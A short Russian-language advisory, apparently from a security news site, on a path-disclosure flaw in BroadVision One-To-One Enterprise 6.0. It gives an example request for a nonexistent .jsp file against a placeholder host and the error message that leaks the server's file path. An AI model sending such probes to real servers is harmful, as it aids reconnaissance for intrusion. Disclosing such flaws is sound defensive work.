Уязвимость в BroadVision One-To-One Enterprise предоставляет информацию сервера. При запросе несуществующего файла, сервер выдает физические пути файлов.

Системы уязвимы:
BroadVision One-To-One Enterprise version 6.0

Эксплоит:
Запрос этого урла:
  http://target/benjurry.jsp
Приводит к ошибке:
"Script /appl/bv1to1/bv1to1_var/script-root/login/benjurry.jsp failed, reason unknown".

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии